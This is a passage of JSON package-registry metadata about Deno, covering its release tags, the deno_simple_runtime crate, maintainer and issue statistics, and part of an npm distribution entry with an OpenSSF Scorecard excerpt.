//github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-26T04:05:00.252Z","dependent_packages_count":0,"downloads":23152,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":25.881803102920557,"dependent_repos_count":29.318292202377133,"dependent_packages_count":33.81230354737315,"stargazers_count":0.04123786919347892,"forks_count":0.09988728315753782,"average":17.83070480100437},"purl":"pkg:cargo/deno_simple_runtime","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_simple_runtime","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_simple_runtime","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_simple_runtime/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-25T19:48:12.804Z","issues_count":6610,"pull_requests_count":9623,"avg_time_to_close_issue":17236144.535497494,"avg_time_to_close_pull_request":1534358.7653889374,"issues_closed_count":3787,"pull_requests_closed_count":8008,"pull_request_authors_count":577,"issue_authors_count":2467,"avg_comments_per_issue":2.509531013615734,"avg_comments_per_pull_request":0.7160968512937753,"merged_pull_requests_count":6992,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":664,"past_year_pull_requests_count":1191,"past_year_avg_time_to_close_issue":1367826.3136363637,"past_year_avg_time_to_close_pull_request":1331942.9891472869,"past_year_issues_closed_count":220,"past_year_pull_requests_closed_count":645,"past_year_pull_request_authors_count":182,"past_year_issue_authors_count":368,"past_year_avg_comments_per_issue":1.216867469879518,"past_year_avg_comments_per_pull_request":1.0839630562552478,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":474,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1789,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":386,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":188,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_simple_runtime/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_simple_runtime/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_simple_runtime/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_simple_runtime/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_simple_runtime/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_simple_runtime/codemeta","maintainers":[{"uuid":"69523","login":"tyrchen","name":"Tyr Chen","email":null,"url":"https://github.com/tyrchen","packages_count":186,"html_url":"https://crates.io/users/tyrchen","role":null,"created_at":"2022-11-08T04:00:13.798Z","updated_at":"2022-11-08T04:00:13.798Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/tyrchen/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":11161871,"name":"@deno/linux-arm64-glibc","ecosystem":"npm","description":"linux-arm64-glibc distribution of Deno","homepage":"https://deno.land","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":"deno","versions_count":96,"first_release_published_at":"2024-12-12T21:26:04.655Z","latest_release_published_at":"2026-08-27T17:36:32.631Z","latest_release_number":"2.9.6","last_synced_at":"2026-08-29T21:57:14.931Z","created_at":"2024-12-12T21:50:11.692Z","updated_at":"2026-08-29T21:57:14.932Z","registry_url":"https://www.npmjs.com/package/@deno/linux-arm64-glibc","install_command":"npm install @deno/linux-arm64-glibc","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"lts":"2.2.15","latest":"2.9.6"},"contentPolicy":null},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-14T18:00:32.000Z","size":246768,"stargazers_count":108238,"open_issues_count":1496,"forks_count":6339,"subscribers_count":1425,"default_branch":"main","last_synced_at":"2026-08-15T12:07:29.515Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-15T11:22:15.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a 